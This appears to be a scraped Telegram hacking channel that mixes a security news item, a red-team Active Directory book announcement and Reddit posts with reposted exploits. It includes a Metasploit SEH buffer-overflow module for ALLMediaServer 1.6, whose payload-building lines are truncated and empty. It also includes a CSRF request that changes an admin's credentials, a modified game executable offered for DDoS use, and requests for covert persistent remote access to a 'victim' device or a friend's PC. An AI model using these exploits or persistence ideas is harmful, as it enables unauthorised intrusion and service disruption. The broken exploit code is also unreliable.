Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.7K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Dark Reading: Attacks/Breaches
A Comprehensive Backup Strategy Includes SaaS Data, Source Code

Backups aren't just limited to hard drives, databases and servers. This Tech Tip describes how organizations should expand their backup strategies.
The goal is simple
To share my modest knowledge about hacking Windows systems. This is commonly refered to as red team exercises. This book however, is also very concerned with the blue team; the defenders. That is, helping those who are working as defenders, analysts and security experts to build secure Active Directory (https://www.kitploit.com/search/label/Active%20Directory) environments and monitor them for malicious activity. There are three major parts in this book Building a lab Hacking it Defending it I have structured this book so it can be followed more or less sequentally. To practice many of these things, a lab is necessary. That is why I have made a few guides on how to build a lab, with varying degrees of comprehensiveness and size. Getting started GETTING STARTED (https://github.com/chryzsh/DarthSidious/blob/master/getting-started/getting-started.md) Getting the Source Code The source for this book is available in the book's github repository (https://github.com/chryzsh/DarthSidious). Changelog Date Who What May 2017 chryzsh Book created March 2018 chryzsh Restructured book 30.03.2018 bufferov3rride Added article Pivoting Through Exchange (https://github.com/chryzsh/DarthSidious/blob/master/initial-access/initial-access-through-exchange.md) 02.04.2018 chryzsh Restructured book again and removed some unfinished articles 11.04.2018 chryzsh Added the article Building a (https://github.com/chryzsh/DarthSidious/tree/fdd707cf9dbbc2faf3cf3dbbcd712b06fceeee87/labs/labs/cuckoo-malware-analysis-lab.md)malware analysis (https://www.kitploit.com/search/label/Malware%20Analysis) lab 14.04.2018 chryzsh Added the article Password (https://github.com/chryzsh/DarthSidious/blob/master/credential-access/password-cracking-and-auditing.md)cracking (https://www.kitploit.com/search/label/Cracking) and auditing 23.04.2018 filippos Added the article CrackMapExec (https://github.com/chryzsh/DarthSidious/blob/master/execution/crackmapexec.md) 06.05.2018 chryzsh Fixed a link messup and some restructuring Questions/Suggestions: Ping me on Twitter @chryzsh (https://twitter.com/chryzsh)

Download DarthSidious (https://github.com/chryzsh/DarthSidious)

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
DarthSidious - Building An Active Directory Domain And Hacking It

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNqHK3M2bbVYYgon7HLQelOgEJO_DimClCLX80AVnt-UwNkgLAhk-jQ-jHdNwAwzaU6GlH7vPLVjAjLrxG6MfbRFUSJDK6acKTy5FnUTxfjzMEI4l72S1FNlXzRgVP-a36QbEESJIqcxpkWRmFM5i76uzEt64RLy2PwKBpQNP80xRvvSm7bM3F_6q2/w640-h516/DarthSidious.png
The goal is simple
To share my modest knowledge about hacking Windows systems. This is commonly refered to as red team exercises. This book however, is also very concerned with the blue team; the defenders. That is, helping those who are working as defenders, analysts and security experts to build secure Active Directory environments and monitor them for malicious activity.

There are three major parts in this book

1. Building a lab
2. Hacking it
3. Defending it

I have structured this book so it can be followed more or less sequentally. To practice many of these things, a lab is necessary. That is why I have made a few guides on how to build a lab, with varying degrees of comprehensiveness and size.

Getting started

GETTING STARTED

Getting the Source Code

The source for this book is available in the book's github repository.

Changelog
Date Who What May 2017 chryzsh Book created March 2018 chryzsh Restructured book 30.03.2018 bufferov3rride Added article Pivoting Through Exchange 02.04.2018 chryzsh Restructured book again and removed some unfinished articles 11.04.2018 chryzsh Added the article Building a malware analysis lab 14.04.2018 chryzsh Added the article Password cracking and auditing 23.04.2018 filippos Added the article CrackMapExec 06.05.2018 chryzsh Fixed a link messup and some restructuring
Questions/Suggestions: Ping me on Twitter @chryzsh
Download DarthSidious

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Are wordlist attacks towards WPA2 even practical when pen testing a company?

Assuming that this company doesn’t have a password like “abc123” would a wordlist/dictionary attack be practical when trying to gain access to their network? What other ways could one go about cracking WPA2 ?

submitted by /u/MojoSiwa
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
https://b.thumbs.redditmedia.com/6uO2j_vLF7JcdST3ZkA162eQuoDHwAqWf6sTulUD1Jc.jpg This is the growtopia exe that you can open multiple window/instance of growtopia



made possible through reverse engineering.

You can use this for farming bot purposes , DDOSING the growtopia server if you have to LOL



and run multiple account :)

to use this just download this exe and replace the exe at the growtopia folder with

https://preview.redd.it/cqk34rva5qr81.png?width=1365&format=png&auto=webp&s=37450879092d6e24e31df6746481c0582fe335b3

the new exe



This is not a virus, you can check it through virustotal.com



[Download link](https://drive.google.com/file/d/1d9zrPqdvbp5XZxZkePM4OMqPbaDSKjH9/view?usp=sharing)



Credit : (open the credit window in growtopia)

submitted by /u/minotokagumi
[link] [comments]
hacking: security in practice
can my employers monitor everything on my work laptop?

I'm not sure if this is the right sub. Yesterday, I went to CR just quick while my laptop was open with low volume of music from spotify, I came back and noticed that the spotify wasn't playing anymore, and checked that it was logged out. Spotify is allowed, and Facebook is, I think, allowed because I sometimes communicate with colleagues through that platform. I'm just a bit woried that they can access my personal accounts that easy. Can my employers have access to my social media through other computers?

submitted by /u/VitreousHaha
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
What is the optimal way to connect to always traveling device regardless the firewall?

In my LAN I've SSH access ass well x11vnc and want to be able to do the same thing when the victim is outside of the LAN regardless the what type of a network/firewall victim use for connection at the time. I understand that to be able to bypass all the firewall regardless the network victim would have to initiate connection first to some kind of a server - RPI or some small VPS with at least Wireguard VPN server running.

This is learning project and I have full physical access to victims system(ubuntu and macos), there are few things that comes to my mind but I'm not sure if that's the best way:

1. On victims device I would run Cron job every 5 min executing bash script with:

* init SSH connection (ssh/mosh)?
* init Wireguard connection and create some sort of a split tunnel for attacker only and victim would using regular connection so there would not be any slow down on their side - is that even possible and would I have unrestricted access to the victims underlying network as well or just VPN tunnel?

Does any of this make sense or there are better ways?

submitted by /u/No-Race8789
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
i have ip and location

i have my friend's ip and location how do i access his pc , i want to prank him or smth

submitted by /u/ThatIsNotIllegal
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Friends using each other’s network to learn. Any pointers?

Basically the title. My friend and I have been using each other’s network and computers to learn new techniques such as nmap, SET, and trying to use shells. We both get on a discord call and give each other permission to try “XYZ”.

Does anyone have any experience with this? Learning with a friend? Also, are there any other methods or pointers that we could use that would increase our skills without destroying our systems? We are both using Kali currently. Thanks!

submitted by /u/MifistoScared
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
ALLMediaServer 1.6 Buffer Overflow

https://3.bp.blogspot.com/-Ct9xsH2cBRo/WWlviFueiJI/AAAAAAAAIQc/IuoXrqbibrUTnkZ-3FJLKgVXuEB0NPH5wCLcBGAs/s1600/h92.png
This Metasploit module exploits a stack buffer overflow in ALLMediaServer version 1.6. The vulnerability is caused due to a boundary error within the handling of HTTP request.

MD5 | 61fcfaad6e71b0e3655c316038732c1b

Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh

def initialize(info = {})
super(
update_info(
info,
'Name' => 'ALLMediaServer 1.6 SEH Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow leading to a SEH handler overwrite
in ALLMediaServer 1.6. The vulnerability is caused due to a boundary error
within the handling of a HTTP request. Note that this exploit will only work
against x86 or WoW64 targets, x64 is not supported at this time.
},
'License' => MSF_LICENSE,
'Author' => [
'Hejap Zairy Al-Sharif', # Aka @Matrix07ksa. Remote exploit and Metasploit module
],
'DefaultOptions' => {
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Arch' => [ARCH_X86],
'Payload' => {
'BadChars' => '\x00\x0a\x0d\xff'
},
'Targets' => [
[
'ALLMediaServer 1.6',
{
'Ret' => 0x0040590B, # POP ESI # POP EBX # RET
'Offset' => 1072
}
],
],
'Privileged' => false,
'DisclosureDate' => '2022-04-01',
'DefaultTarget' => 0,
'References' => [
['CVE', '2022-28381'],
['URL', 'https://github.com/Matrix07ksa/ALLMediaServer-1.6-Buffer-Overflow']
],
'Notes' => {
'Stability' => [CRASH_SERVICE_DOWN], # If this fails the service will go down and will not restart.
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([Opt::RPORT(888)])
end

def exploit
connect
buffer = ''
buffer <<
buffer <<
buffer <<
buffer <<
buffer <<
print_status('Sending payload to exploit MediaServer...')
sock.put(buffer)
print_status('Sent payload...hopefully we should get a shell!')
handler
disconnect
end
end

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Banquet Booking System 1.0 Cross Site Request Forgery

https://1.bp.blogspot.com/-5p3p8L1fqP0/WWlvePVRIQI/AAAAAAAAIPs/HQNau6TSJkE3hBLTqqPcfPLddrlr7m4uACLcBGAs/s1600/h81.png
Online Banquet Booking System version 1.0 suffers from a cross site request forgery vulnerability.

MD5 | 5440ce3decaa8c6b0d1937f92bf1b8c6

Download
# Exploit Title: Online Banquet Booking System - 'change admin credentials' Cross-Site Request Forgery (CSRF)
# Date: 04/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/online-banquet-booking-system-using-php-and-mysql/
# Version: 1.0
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz

# Description :

The application is not using any security token to prevent it against CSRF. Therefore, malicious user can change admin credentials by using crafted post request.
# HTTPS Request :

POST /obbs/admin/admin-profile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://localhost
Connection: close
Referer: http://localhost/obbs/admin/admin-profile.php
Cookie: PHPSESSID=5lotcnigq4mddq3rr6tnnlvn3e
Upgrade-Insecure-Requests: 1

adminname=Admin&username=admin&email=admin%40gmail.com&mobilenumber=5689784589&submit=
# Poc Html :

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video